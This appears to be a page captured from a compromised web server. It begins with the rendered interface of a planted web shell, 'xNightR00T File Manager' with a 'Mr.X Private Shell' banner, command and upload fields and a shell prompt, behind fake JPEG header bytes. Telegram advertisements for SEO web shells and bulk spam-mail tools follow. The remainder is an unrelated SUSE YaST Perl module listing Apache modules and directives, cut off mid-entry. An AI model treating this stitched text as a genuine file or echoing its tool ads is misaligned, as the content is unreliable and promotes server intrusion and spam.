xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
package YaPI::HTTPDModules;
use YaPI;
textdomain "http-server";
%modules = (
# (without_leading mod_) module name = {
#	summary   => __("Translatable text with module description - will be shown in YaST table"),
#	packages  => [ list of rpm packages needed for particular module ],
#	default	  => 0 or 1 if this module should be enabled by default
#       postition => order in /etc/sysconfig/apache2 (lowest numbew, ... , higher number)   
#	requires  => required modulename (this is used in YaST dialog validation)
# }
    'authz_host' => {
                    summary   => __("Provides access control based on client host name, IP address, etc."),
                    packages  => [],
                    default   => 1,
                    position  => 10,
		    directives=> [ { option => "Require", "context" => [ "Directory", "Files", "Location" ] }
				 ]
    },
    'actions' => {
                    summary   => __("Executing CGI scripts based on media type or request method"),
                    packages  => [],
                    default   => 1,
                    position  => 20,
		    directives=> [ { option => "Action", "context" => [ "Directory", "Server", "Virtual" ] },
				   { option => "Script", "context" => [ "Directory", "Server", "Virtual" ] }
				 ]
    },
    'alias' => {
                    summary   => __("Mapping different parts of the host file system in the document tree and for URL redirection"),
                    packages  => [],
                    default   => 1,
                    position  => 30,
                    directives=> [ { option => "Alias", 		"context" => [ "Server", "Virtual" ] },
				   { option => "AliasMatch", 		"context" => [ "Server", "Virtual" ] },
				   { option => "Redirect", 		"context" => [ "Directory", "Server", "Virtual" ] },
				   { option => "RedirectMatch", 	"context" => [ "Directory", "Server", "Virtual" ] },
				   { option => "RedirectPermanent", 	"context" => [ "Directory", "Server", "Virtual" ] },
				   { option => "RedirectTemp", 		"context" => [ "Directory", "Server", "Virtual" ] },
				   { option => "ScriptAlias", 		"context" => [ "Server", "Virtual" ] },
				   { option => "ScriptAliasMatch",	"context" => [ "Server", "Virtual" ] }
				]
    },
    'auth_basic' => {
                    summary   => __("Basic authentication"),
                    packages  => [],
                    default   => 1,
                    position  => 40,
		    directives=> [ { option => "AuthBasicAuthoritative", "context" => [ "Directory" ] , "values" => [ "On", "Off" ] },
				   { option => "AuthBasicProvider",     "context" => [ "Directory" ] }
				]
    },
    'authn_file' => {
                    summary   => __("User authentication using text files"),
                    packages  => [],
                    default   => 1,
                    position  => 40,
		    directives=> [ { option => "AuthUserFile", "context" => [ "Directory" ] }
				]
    },
    'authz_user' => {
                    summary   => __("User Authorization"),
                    packages  => [],
                    default   => 1,
                    position  => 40,
		    directives=> [ { option => "AuthzUserAuthoritative", "context" => [ "Directory" ], "values" => [ "On", "Off" ] }
				]
    },
    'authz_groupfile' => {
                    summary   => __("Group authorization using plaintext files"),
                    packages  => [],
                    default   => 1,
                    position  => 40,
		    directives=> [ { option => "AuthGroupFile", "context" => [ "Directory" ] },
				   { option => "AuthzGroupFileAuthoritative", "context" => [ "Directory" ], "values" => [ "On", "Off" ] }
				]
    },
    'authn_dbm' => {
                    summary   => __("User authentication using DBM files"),
                    packages  => [],
                    default   => 0,
                    position  => 50,
                    module    => {
                                    AuthDBMType => 'mod_auth_dbm',
                                    AuthDBMUserFile => 'mod_auth_dbm'
                    },
                    directives=> [ 
				   { option => "AuthDBMType", 	       "context" => [ "Directory" ] , 
										"values" => [ "default", "SDBM", "GDBM", "NDBM", "DB" ] },
				   { option => "AuthDBMUserFile",      "context" => [ "Directory" ] }
				]
    },
    'autoindex' => {
                    summary   => __("Generates directory indices, automatically, similar to the Unix ls command"),
                    packages  => [],
                    default   => 1,
                    position  => 60,
                    directives=> [ { option => "AddAlt", 		"context" => [ "Directory", "Server", "Virtual" ] },
				   { option => "AddAltByEncoding", 	"context" => [ "Directory", "Server", "Virtual" ] },
				   { option => "AddAltByType", 		"context" => [ "Directory", "Server", "Virtual" ] },
				   { option => "AddDescription", 	"context" => [ "Directory", "Server", "Virtual" ] },
				   { option => "AddIcon", 		"context" => [ "Directory", "Server", "Virtual" ] },
				   { option => "AddIconByEncoding", 	"context" => [ "Directory", "Server", "Virtual" ] },
				   { option => "AddIconByType", 	"context" => [ "Directory", "Server", "Virtual" ] },
				   { option => "DefaultIcon", 		"context" => [ "Directory", "Server", "Virtual" ] },
				   { option => "HeaderName", 		"context" => [ "Directory", "Server", "Virtual" ] },
				   { option => "IndexIgnore", 		"context" => [ "Directory", "Server", "Virtual" ] },
				   { option => "IndexOptions", 		"context" => [ "Directory", "Server", "Virtual" ] },
				   { option => "IndexOrderDefault", 	"context" => [ "Directory", "Server", "Virtual" ] },
				   { option => "IndexStyleSheet", 	"context" => [ "Directory", "Server", "Virtual" ] },
				   { option => "ReadmeName", 		"context" => [ "Directory", "Server", "Virtual" ] }
				]
    },
    'cgi' => {
                    summary   => __("Execution of CGI scripts"),
                    packages  => [],
                    default   => 1,
                    position  => 70,
                    directives=> [ { option => "ScriptLog", 		"context" => [ "Server", "Virtual" ] },
				   { option => "ScriptLogBuffer", 	"context" => [ "Server", "Virtual" ] },
				   { option => "ScriptLogLength", 	"context" => [ "Server", "Virtual" ] },
				   { option => "Options",		"context" => [ "Directory" ] }
				]
    },
    'dir' => {
                    summary   => __("Provides for trailing slash redirects and serving directory index files"),
                    packages  => [],
                    default   => 1,
                    position  => 80,
                    directives=> [ { option => "DirectoryIndex", "context" => [ "Directory", "Server", "Virtual" ] },
				   { option => "DirectorySlash", "context" => [ "Directory", "Server", "Virtual" ] , "values" => [ "On", "Off" ] }
				]
    },
    'env' => {
                    summary   => __("Modifies the environment passed to CGI scripts and SSI pages"),
                    packages  => [],
                    default   => 0,
                    position  => 90,
                    directives=> [ { option => "PassEnv",  "context" => [ "Directory", "Server", "Virtual" ] },
				   { option => "SetEnv",   "context" => [ "Directory", "Server", "Virtual" ] },
				   { option => "UnsetEnv", "context" => [ "Directory", "Server", "Virtual" ] } 
				]
    },
    'expires' => {
                    summary   => __("Generation of Expires HTTP headers according to user-specified criteria"),
                    packages  => [],
                    default   => 0,
                    position  => 100,
                    module    => {
                                    ExpiresActive  => 'mod_expires',
                                    ExpiresByType  => 'mod_expires',
                                    ExpiresDefault => 'mod_expires'
                    },
                    directives=> [ { option => "ExpiresActive",  "context" => [ "Directory", "Server", "Virtual" ] , "values" => [ "On", "Off" ] },
				   { option => "ExpiresByType",  "context" => [ "Directory", "Server", "Virtual" ] },
				   { option => "ExpiresDefault", "context" => [ "Directory", "Server", "Virtual" ] } 
				]
    },
    'include' => {
                    summary   => __("Server-parsed HTML documents (Server Side Includes)"),
                    packages  => [],
                    default   => 1,
                    position  => 110,
                    directives=> [ { option => "SSIEndTag", 		"context" => [ "Server", "Virtual" ] },
				   { option => "SSIErrorMsg", 		"context" => [ "Directory", "Server", "Virtual" ] },
				   { option => "SSIStartTag", 		"context" => [ "Server", "Virtual" ] },
				   { option => "SSITimeFormat", 	"context" => [ "Directory", "Server", "Virtual" ] },
				   { option => "SSIUndefinedEcho", 	"context" => [ "Server", "Virtual" ] },
				   { option => "XBitHack", 		"context" => [ "Directory", "Server", "Virtual" ], 
														"values" => [ "On", "Off", "Full" ] }
				]
    },
    'log_config' => {
                    summary   => __("Logging of the requests made to the server"),
                    packages  => [],
                    default   => 1,
                    position  => 120,
                    directives=> [ { option => "BufferedLogs",  "context" => [ "Server" ] , "values" => [ "On", "Off" ] },
				   { option => "CookieLog",   	"context" => [ "Server", "Virtual" ] },
				   { option => "CustomLog",     "context" => [ "Server", "Virtual" ] },
				   { option => "LogFormat",   	"context" => [ "Server", "Virtual" ] },
				   { option => "TransferLog", 	"context" => [ "Server", "Virtual" ] } 
				]
    },
    'mime' => {
                    summary   => __("Associates the requested file name\'s extensions with the file\'s behavior and content"),
                    packages  => [],
                    default   => 1,
                    position  => 130,
                    directives=> [ { option => "AddCharset", 			"context" => [ "Directory", "Server", "Virtual" ] },
				   { option => "AddEncoding", 			"context" => [ "Directory", "Server", "Virtual" ] },
				   { option => "AddHandler", 			"context" => [ "Directory", "Server", "Virtual" ] },
				   { option => "AddInputFilter",		"context" => [ "Directory", "Server", "Virtual" ] },
				   { option => "AddLanguage", 			"context" => [ "Directory", "Server", "Virtual" ] },
				   { option => "AddOutputFilter", 		"context" => [ "Directory", "Server", "Virtual" ] },
				   { option => "AddType", 			"context" => [ "Directory", "Server", "Virtual" ] },
                                   { option => "DefaultLanguage",               "context" => [ "Directory", "Server", "Virtual" ] },
				   { option => "ModMimeUsePathInfo",		"context" => [ "Directory" ], "values" => [ "On", "Off" ] },
				   { option => "MultiviewsMatch", 		"context" => [ "Directory", "Server", "Virtual" ] },
				   { option => "RemoveCharset", 		"context" => [ "Directory", "Virtual" ] },
				   { option => "RemoveEncoding", 		"context" => [ "Directory", "Virtual" ] },
				   { option => "RemoveHandler", 		"context" => [ "Directory", "Virtual" ] },
				   { option => "RemoveInputFilter", 		"context" => [ "Directory", "Virtual" ] },
				   { option => "RemoveLanguage", 		"context" => [ "Directory", "Virtual" ] },
				   { option => "RemoveOutputFilter", 		"context" => [ "Directory", "Virtual" ] },
				   { option => "RemoveType", 			"context" => [ "Directory", "Virtual" ] },
				   { option => "TypesConfig", 			"context" => [ "Server" ] }
				]
    },
    'negotiation' => {
                    summary   => __("Provides for content negotiation"),
                    packages  => [],
                    default   => 1,
                    position  => 140,
                    directives=> [ { option => "CacheNegotiatedDocs", 	"context" => [ "Server", "Virtual" ], "values" => [ "On", "Off" ] },
				   { option => "ForceLanguagePriority", "context" => [ "Directory", "Server", "Virtual" ] },
				   { option => "LanguagePriority", 	"context" => [ "Directory", "Server", "Virtual" ] }
				]
    },
    'setenvif' => {
                    summary   => __("Allows the setting of environment variables based on characteristics of the request"),
                    packages  => [],
                    default   => 1,
                    position  => 150,
                    directives=> [ { option => "BrowserMatch", 		"context" => [ "Directory", "Server", "Virtual" ] },
				   { option => "BrowserMatchNoCase", 	"context" => [ "Directory", "Server", "Virtual" ] },
				   { option => "SetEnvIf", 		"context" => [ "Directory", "Server", "Virtual" ] },
				   { option => "SetEnvIfNoCase", 	"context" => [ "Directory", "Server", "Virtual" ] }
				]
    },
    'status' => {
                    summary   => __("Provides information about server activity and performance"),
                    packages  => [],
                    default   => 1,
                    position  => 160,
                    directives=> [ { option => "ExtendedStatus", "context" => [ "Server" ], "values" => [ "On", "Off" ] } 
				]
    },
    'suexec' => {
                    summary   => __("Allows CGI scripts to run as a specified user and group"),
                    packages  => [],
                    default   => 0,
                    position  => 0,
                    module    => {
                                    SuexecUserGroup => 'mod_suexec',
                    },
                    directives=> [ { option =>"SuexecUserGroup", "context" => [ "Server", "Virtual" ] } 
				]
    },
    'userdir' => {
                    summary   => __("User-specific directories"),
                    packages  => [],
                    default   => 1,
                    position  => 180,
                    directives=> [ { option =>"UserDir", "context" => [ "Server", "Virtual" ] } 
				]
    },
    'asis' => {
                    summary   => __("Sends files that contain their own HTTP headers"),
                    packages  => [],
                    default   => 1,
                    position  => 190
    },
    'authn_anon' => {
                    summary   => __("Allows \"anonymous\" user access to authenticated areas"),
                    packages  => [],
                    default   => 0,
                    position  => 200,
                    module    => { 
                                    Anonymous => 'mod_auth_anon',
                                    Anonymous_Authoritative => 'mod_auth_anon',
                                    Anonymous_LogEmail => 'mod_auth_anon',
                                    Anonymous_MustGiveEmail => 'mod_auth_anon',
                                    Anonymous_NoUserID => 'mod_auth_anon',
                                    Anonymous_VerifyEmail => 'mod_auth_anon'
                    },
                    directives=> [ { option =>"Anonymous", 			"context" => [ "Directory" ] },
				   { option =>"Anonymous_Authoritative", 	"context" => [ "Directory" ], "values" => [ "On", "Off" ] },
				   { option =>"Anonymous_LogEmail", 		"context" => [ "Directory" ], "values" => [ "On", "Off" ] },
				   { option =>"Anonymous_MustGiveEmail", 	"context" => [ "Directory" ], "values" => [ "On", "Off" ] },
				   { option =>"Anonymous_NoUserID", 		"context" => [ "Directory" ] },
				   { option =>"Anonymous_VerifyEmail", 		"context" => [ "Directory" ], "values" => [ "On", "Off" ] }
				]
    },
    'auth_digest' => {
                    summary   => __("User authentication using MD5 Digest Authentication"),
                    packages  => [],
                    default   => 0,
                    position  => 210,
                    directives=> [ { option =>"AuthDigestAlgorithm", 		"context" => [ "Directory" ], "values" => [ "MD5", "MD5-sess" ] },
				   { option =>"AuthDigestDomain", 		"context" => [ "Directory" ] },
				   { option =>"AuthDigestNcCheck", 		"context" => [ "Server" ], "values" => [ "On", "Off" ] },
				   { option =>"AuthDigestNonceFormat", 		"context" => [ "Directory" ] },
				   { option =>"AuthDigestProvider", 		"context" => [ "Directory" ] },
				   { option =>"AuthDigestNonceLifetime", 	"context" => [ "Directory" ] },
				   { option =>"AuthDigestQop", 			"context" => [ "Directory" ] },
				   { option =>"AuthDigestShmemSize", 		"context" => [ "Server" ] } 
				]
    },
    'authnz_ldap' => {
                    summary   => __("Allows an LDAP directory to be used to store the database for HTTP Basic authentication"),
                    packages  => [],
                    default   => 0,
                    position  => 355,
                    directives=> [ { option =>"AuthLDAPBindDN", 		"context" => [ "Directory" ] },
				   { option =>"AuthLDAPBindPassword", 		"context" => [ "Directory" ] },
				   { option =>"AuthLDAPCharsetConfig", 		"context" => [ "Server" ] },
				   { option =>"AuthLDAPCompareDNOnServer", 	"context" => [ "Directory" ], "values" => [ "On", "Off" ] },
 				   { option =>"AuthLDAPDereferenceAliases", 	"context" => [ "Directory" ], 
											"values" => [ "Never", "Searching", "Finding", "Always" ] }, 
				   { option =>"AuthLDAPGroupAttribute", 	"context" => [ "Directory" ] },
				   { option =>"AuthLDAPGroupAttributeIsDN", 	"context" => [ "Directory" ], "values" => [ "On", "Off" ] },
				   { option =>"AuthLDAPRemoteUserIsDN", 	"context" => [ "Directory" ], "values" => [ "On", "Off" ] },
				   { option =>"AuthLDAPUrl", 			"context" => [ "Directory" ] },
				   { option =>"AuthzLDAPAuthoritative", 	"context" => [ "Directory" ], "values" => [ "On", "Off" ] }
				]
    },
    'cache' => {
                    summary   => __("Content cache keyed to URIs"),
                    packages  => [],
                    default   => 0,
                    position  => 230,
                    directives=> [ { option =>"CacheDefaultExpire", 	"context" => [ "Server", "Virtual" ] },
				   { option =>"CacheDisable", 		"context" => [ "Server", "Virtual" ] },
                                   { option =>"CacheEnable", 		"context" => [ "Server", "Virtual" ] },
                                   { option =>"CacheIgnoreCacheControl","context" => [ "Server", "Virtual" ], "values" => [ "On", "Off" ] },
                                   { option =>"CacheIgnoreHeaders", 	"context" => [ "Server", "Virtual" ] },
                                   { option =>"CacheIgnoreNoLastMod", 	"context" => [ "Server", "Virtual" ], "values" => [ "On", "Off" ] },
                                   { option =>"CacheLastModifiedFactor","context" => [ "Server", "Virtual" ] },
                                   { option =>"CacheMaxExpire", 	"context" => [ "Server", "Virtual" ] },
                                   { option =>"CacheStoreNoStore", 	"context" => [ "Server", "Virtual" ], "values" => [ "On", "Off" ] },
                                   { option =>"CacheStorePrivate", 	"context" => [ "Server", "Virtual" ], "values" => [ "On", "Off" ] }
                                ]
    },
    'charset_lite' => {
                    summary   => __("Specify character set translation or recoding"),
                    packages  => [],
                    default   => 0,
                    position  => 240,
                    directives=> [ { option =>"CharsetDefault", 	"context" => [ "Directory", "Server", "Virtual" ] },
                                   { option =>"CharsetOptions", 	"context" => [ "Directory", "Server", "Virtual" ] },
                                   { option =>"CharsetSourceEnc", 	"context" => [ "Directory", "Server", "Virtual" ] }
                                ]
    },
    'dav' => {
                    summary   => __("Distributed Authoring and Versioning (WebDAV) functionality"),
                    packages  => [],
                    default   => 0,
                    position  => 250,
                    module    => {
                                  Dav => 'mod_dav',
                                  DavDepthInfinity => 'mod_dav',
                                  DavMinTimeout => 'mod_dav'
                    },
                    directives=> [ { option =>"Dav", 			"context" => [ "Directory" ] },
				   { option =>"DavDepthInfinity", 	"context" => [ "Directory", "Server", "Virtual" ], "values" => [ "On", "Off" ] },
				   { option =>"DavMinTimeout", 		"context" => [ "Directory", "Server", "Virtual" ] }
                                ]
    },
    'dav_fs' => {
                    summary   => __("File system provider for mod_dav"),
                    packages  => [],
                    default   => 0,
                    position  => 260,
                    module    => {
                                  DavLockDB => 'mod_dav_fs'
                    },
                    directives=> [ { option =>"DavLockDB", "context" => [ "Server", "Virtual" ] }
                                ]
    },
    'deflate' => {
                    summary   => __("Compress content before it is delivered to the client"),
                    packages  => [],
                    default   => 0,
                    position  => 270,
                    module    => {
                                  DeflateBufferSize => 'mod_deflate',
                                  DeflateCompressionLevel => 'mod_deflate',
                                  DeflateFilterNote => 'mod_deflate',
                                  DeflateMemLevel => 'mod_deflate',
                                  DeflateWindowSize => 'mod_deflate'
                    },
                    directives=> [ { option =>"DeflateBufferSize", 		"context" => [ "Server", "Virtual" ] },
				   { option =>"DeflateCompressionLevel", 	"context" => [ "Server", "Virtual" ] },
				   { option =>"DeflateFilterNote", 		"context" => [ "Server", "Virtual" ] },
				   { option =>"DeflateMemLevel", 		"context" => [ "Server", "Virtual" ] },
				   { option =>"DeflateWindowSize", 		"context" => [ "Server", "Virtual" ] }
                                ]
    },
    'disk_cache' => {
                    summary   => __("Content cache storage manager keyed to URIs"),
                    packages  => [],
                    default   => 0,
                    position  => 280,
		    requires  => "cache",
                    directives=> [ { option =>"CacheDirLength",		"context" => [ "Server", "Virtual" ] },
				   { option =>"CacheDirLevels",         "context" => [ "Server", "Virtual" ] },
                                   { option =>"CacheMaxFileSize",       "context" => [ "Server", "Virtual" ] },
                                   { option =>"CacheMinFileSize",       "context" => [ "Server", "Virtual" ] },
                                   { option =>"CacheRoot",              "context" => [ "Server", "Virtual" ] },
				]
    },
    'echo' => {
                    summary   => __("A simple echo server to illustrate protocol modules"),
                    packages  => [],
                    default   => 0,
                    position  => 290,
                    directives=> [ { option =>"ProtocolEcho", "context" => [ "Server", "Virtual" ], "values" => [ "On", "Off" ] }
				]
    },
    'ext_filter' => {
                    summary   => __("Pass the response body through an external program before delivery to the client"),
                    packages  => [],
                    default   => 0,
                    position  => 300,
                    module    => {
                                    ExtFilterDefine  => 'mod_ext_filter',
                                    ExtFilterOptions => 'mod_ext_filter',
                    },
                    directives=> [ { option =>"ExtFilterDefine", 	"context" => [ "Server" ] },
				   { option =>"ExtFilterOptions", 	"context" => [ "Directory" ] }
                                ]
    },
    'file_cache' => {
                    summary   => __("Caches a static list of files in memory"),
                    packages  => [],
                    default   => 0,
                    position  => 310,
		    requires  => "cache",
                    directives=> [ { option =>"CacheFile",      "context" => [ "Server" ] },
                                   { option =>"MMapFile",	"context" => [ "Server" ] }
                                ]
    },
    'headers' => {
                    summary   => __("Customization of HTTP request and response headers"),
                    packages  => [],
                    default   => 0,
                    position  => 320,
                    module    => {
                                    Header => 'mod_headers',
                                    RequestHeader => 'mod_headers'
                    },
                    directives=> [ { option =>"Header",      	"context" => [ "Server", "Virtual", "Directory" ] },
                                   { option =>"RequestHeader",  "context" => [ "Server", "Virtual", "Directory" ] }
                                ]
    },
    'imagemap' => {
                    summary   => __("Server-side image map processing"),
                    packages  => [],
                    default   => 1,
                    position  => 330,
                    directives=> [ { option =>"ImapBase",       "context" => [ "Server", "Virtual", "Directory" ] },
                                   { option =>"ImapDefault",  	"context" => [ "Server", "Virtual", "Directory" ] },
                                   { option =>"ImapMenu",  	"context" => [ "Server", "Virtual", "Directory" ], 
									"values" => [ "none", "formatted", "semiformatted", "unformatted" ] }
                                ]
    },
    'info' => {
                    summary   => __("Provides a comprehensive overview of the server configuration"),
                    packages  => [],
                    default   => 0,
                    position  => 340,
                    module    => { AddModuleInfo => 'mod_info' },
                    directives=> [ { option =>"AddModuleInfo",         "context" => [ "Server", "Virtual" ] },
				]
    },
    'ldap' => {
                    summary   => __("LDAP connection pooling and result caching services for use by other LDAP modules"),
                    packages  => [],
                    default   => 0,
                    position  => 350,
                    directives=> [ { option =>"LDAPCacheEntries", 	"context" => [ "Server" ] },
				   { option =>"LDAPCacheTTL", 		"context" => [ "Server" ] },
                                   { option =>"LDAPConnectionTimeout", 	"context" => [ "Server" ] },
                                   { option =>"LDAPOpCacheEntries", 	"context" => [ "Server" ] },
                                   { option =>"LDAPOpCacheTTL", 	"context" => [ "Server" ] },
                                   { option =>"LDAPSharedCacheFile", 	"context" => [ "Server" ] },
                                   { option =>"LDAPSharedCacheSize", 	"context" => [ "Server" ] },
                                   { option =>"LDAPTrustedGlobalCert",	"context" => [ "Server" ] },
                                   { option =>"LDAPTrustedClientCert",	"context" => [ "Server" ] },
                                   { option =>"LDAPTrustedMode",	"context" => [ "Server" ] },
                                   { option =>"LDAPVerifyServerCert",	"context" => [ "Server" ], "values" => [ "On", "Off" ] },
                                   { option =>"LDAPTrustedCAType", 	"context" => [ "Server" ], 
							"values" => [ "DER_FILE", "BASE64_FILE", "CERT7_DB_PATH" ] }	
                                ]
    },
    'logio' => {
                    summary   => __("Logging of input and output bytes per request"),
                    packages  => [],
                    default   => 0,
                    position  => 360
    },
    'mem_cache' => {
                    summary   => __("Content cache keyed to URIs"),
                    packages  => [],
                    default   => 0,
                    position  => 370,
		    requires  => "cache",
                    directives=> [ { option =>"MCacheMaxObjectCount",         "context" => [ "Server" ] },
				   { option =>"MCacheMaxObjectSize",          "context" => [ "Server" ] },
                                   { option =>"MCacheMaxStreamingBuffer",     "context" => [ "Server" ] },
                                   { option =>"MCacheMinObjectSize",          "context" => [ "Server" ] },
                                   { option =>"MCacheRemovalAlgorithm",       "context" => [ "Server" ], "values" => [ "LRU", "GDSF" ] },
                                   { option =>"MCacheSize",		      "context" => [ "Server" ] },
				]
    },
    'mime_magic' => {
                    summary   => __("Determines the MIME type of a file by looking at a few bytes of its contents"),
                    packages  => [],
                    default   => 0,
                    position  => 380,
                    module    => { MimeMagicFile => 'mod_mime_magic' },
                    directives=> [ { option =>"MimeMagicFile",         "context" => [ "Server", "Virtual" ] },
                                ]
    },
    'proxy' => {
                    summary   => __("HTTP/1.1 proxy/gateway server"),
                    packages  => [],
                    default   => 0,
                    position  => 390,
                    module    => { 
                                    NoProxy => 'mod_proxy',
                                    ProxyBadHeader => 'mod_proxy',
                                    ProxyBlock => 'mod_proxy',
                                    ProxyDomain => 'mod_proxy',
                                    ProxyErrorOverride => 'mod_proxy',
                                    ProxyIOBufferSize => 'mod_proxy',
                                    ProxyMaxForwards => 'mod_proxy',
                                    ProxyPass => 'mod_proxy',
                                    ProxyPassReverse => 'mod_proxy',
                                    ProxyPreserveHost => 'mod_proxy',
                                    ProxyReceiveBufferSize => 'mod_proxy',
                                    ProxyRemote => 'mod_proxy',
                                    ProxyRemoteMatch => 'mod_proxy',
                                    ProxyRequests => 'mod_proxy',
                                    ProxyTimeout => 'mod_proxy',
                                    ProxyVia => 'mod_proxy',
				    ProxyPassReverseCookieDomain => 'mod_proxy',
				    ProxyPassReverseCookiePath => 'mod_proxy'
                    },
                    directives=> [ { option =>"AllowCONNECT",         	"context" => [ "Server", "Virtual" ] },
				   { option =>"NoProxy",         	"context" => [ "Server", "Virtual" ] },
                                   { option =>"ProxyBadHeader",         "context" => [ "Server", "Virtual" ], 
										"values" => [ "IsError", "Ignore", "StartBody" ] },
                                   { option =>"ProxyBlock",  	        "context" => [ "Server", "Virtual" ] },
                                   { option =>"ProxyDomain",	        "context" => [ "Server", "Virtual" ] },
                                   { option =>"ProxyErrorOverride",     "context" => [ "Server", "Virtual" ], "values" => [ "On", "Off" ] },
                                   { option =>"ProxyIOBufferSize",      "context" => [ "Server", "Virtual" ] },
                                   { option =>"ProxyMaxForwards",       "context" => [ "Server", "Virtual" ] },
                                   { option =>"ProxyPass",	        "context" => [ "Server", "Virtual", "Directory" ] },
                                   { option =>"ProxyPassReverse",       "context" => [ "Server", "Virtual", "Directory" ] },
                                   { option =>"ProxyPreserveHost",      "context" => [ "Server", "Virtual" ], "values" => [ "On", "Off" ] },
                                   { option =>"ProxyReceiveBufferSize", "context" => [ "Server", "Virtual" ] },
                                   { option =>"ProxyPassReverseCookieDomain", "context" => [ "Server", "Virtual" ] },
                                   { option =>"ProxyPassReverseCookiePath", "context" => [ "Server", "Virtual" ] },
                                   { option =>"ProxyRemote",	        "context" => [ "Server", "Virtual" ] },
                                   { option =>"ProxyRemoteMatch",       "context" => [ "Server", "Virtual" ] },
                                   { option =>"ProxyRequests",          "context" => [ "Server", "Virtual" ], "values" => [ "On", "Off" ] },
                                   { option =>"ProxyTimeout",	        "context" => [ "Server", "Virtual" ] },
                                   { option =>"ProxyVia",         	"context" => [ "Server", "Virtual" ], 
												"values" => [ "On", "Off", "Full", "Block" ] }
                                ]
    },
    'proxy_ajp' => {
                    summary   => __("AJP support module for mod_proxy"),
                    packages  => [],
                    default   => 0,
		    requires  => "proxy",
                    position  => 395,
    },
    'proxy_connect' => {
                    summary   => __("mod_proxy extension for CONNECT request handling"),
                    packages  => [],
                    default   => 0,
                    position  => 400,
                    module    => { AllowCONNECT => 'mod_proxy_connect' }
    },
    'proxy_ftp' => {
                    summary   => __("FTP support module for mod_proxy"),
                    packages  => [],
                    default   => 0,
                    position  => 410
    },
    'proxy_http' => {
                    summary   => __("HTTP support module for mod_proxy"),
                    packages  => [],
                    default   => 0,
                    position  => 420
    },
    'rewrite' => {
                    summary   => __("Provides a rule-based rewriting engine to rewrite requested URLs on the fly"),
                    packages  => [],
                    default   => 0,
                    position  => 430,
                    module    => {
                                    RewriteBase => 'mod_rewrite',
                                    RewriteCond => 'mod_rewrite',
                                    RewriteEngine => 'mod_rewrite',
                                    RewriteLock => 'mod_rewrite',
                                    RewriteLog => 'mod_rewrite',
                                    RewriteLogLevel => 'mod_rewrite',
                                    RewriteMap => 'mod_rewrite',
                                    RewriteOptions => 'mod_rewrite',
                                    RewriteRule => 'mod_rewrite'
                    },
                    directives=> [ { option =>"RewriteBase",         "context" => [ "Directory" ] },
				   { option =>"RewriteCond",         "context" => [ "Server", "Virtual", "Directory" ] },
                                   { option =>"RewriteEngine",       "context" => [ "Server", "Virtual", "Directory" ], "values" => [ "On", "Off" ] },
                                   { option =>"RewriteLock",         "context" => [ "Server" ] },
                                   { option =>"RewriteLog",          "context" => [ "Server", "Virtual" ] },
                                   { option =>"RewriteLogLevel",     "context" => [ "Server", "Virtual" ] },
                                   { option =>"RewriteMap",          "context" => [ "Server", "Virtual" ] },
                                   { option =>"RewriteOptions",      "context" => [ "Server", "Virtual", "Directory" ] },
                                   { option =>"RewriteRule",         "context" => [ "Server", "Virtual", "Directory" ] }
                                ]
    },
    'speling' => {
                    summary   => __("Attempts to correct mistaken URLs that users might have entered"),
                    packages  => [],
                    default   => 0,
                    position  => 440,
                    module    => { CheckSpelling => 'mod_speling' },
                    directives=> [ { option =>"CheckSpelling",         "context" => [ "Server", "Virtual", "Directory" ], "values" => [ "On", "Off" ] },
                                ]
    },
    'ssl' => {
                    summary   => __("Strong cryptography using the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols"),
                    packages  => [],
                    default   => 0,
                    position  => 450,
                    directives=> [ { option =>"SSLCACertificateFile", 		"context" => [ "SSL", "Server", "Virtual" ] },
				   { option =>"SSLCACertificatePath", 		"context" => [ "SSL", "Server", "Virtual" ] },
                                   { option =>"SSLCARevocationFile", 		"context" => [ "SSL", "Server", "Virtual" ] },
                                   { option =>"SSLCARevocationPath", 		"context" => [ "SSL", "Server", "Virtual" ] }, 
                                   { option =>"SSLCertificateChainFile", 	"context" => [ "SSL", "Server", "Virtual" ] },
                                   { option =>"SSLCertificateFile", 		"context" => [ "SSL", "Server", "Virtual" ] },
                                   { option =>"SSLCertificateKeyFile", 		"context" => [ "SSL", "Server", "Virtual" ] },
                                   { option =>"SSLCipherSuite", 		"context" => [ "SSL", "Server", "Virtual", "Directory" ] },
                                   { option =>"SSLEngine", 			"context" => [ "SSL", "Server", "Virtual" ], "values" => [ "On", "Off" ] },
                                   { option =>"SSLMutex", 			"context" => [ "SSL", "Server" ] },
                                   { option =>"SSLOptions", 			"context" => [ "SSL", "Server", "Virtual", "Directory" ] },
                                   { option =>"SSLPassPhraseDialog", 		"context" => [ "SSL", "Server" ] },
                                   { option =>"SSLProtocol", 			"context" => [ "SSL", "Server", "Virtual" ] },
                                   { option =>"SSLProxyCACertificateFile", 	"context" => [ "SSL", "Server", "Virtual" ] },
                                   { option =>"SSLProxyCACertificatePath", 	"context" => [ "SSL", "Server", "Virtual" ] },
                                   { option =>"SSLProxyCARevocationFile",  	"context" => [ "SSL", "Server", "Virtual" ] },
                                   { option =>"SSLProxyCARevocationPath",  	"context" => [ "SSL", "Server", "Virtual" ] },
                                   { option =>"SSLProxyCipherSuite", 		"context" => [ "SSL", "Server", "Virtual", "Directory" ] },
                                   { option =>"SSLProxyEngine", 		"context" => [ "SSL", "Server", "Virtual" ], "values" => [ "On", "Off" ] },
                                   { option =>"SSLProxyMachineCertificateFile", "context" => [ "SSL", "Server" ] },
                                   { option =>"SSLProxyMachineCertificatePath", "context" => [ "SSL", "Server" ] },
                                   { option =>"SSLProxyProtocol", 		"context" => [ "SSL", "Server", "Virtual" ] },
                                   { option =>"SSLProxyVerify", 		"context" => [ "SSL", "Server", "Virtual", "Directory" ], 
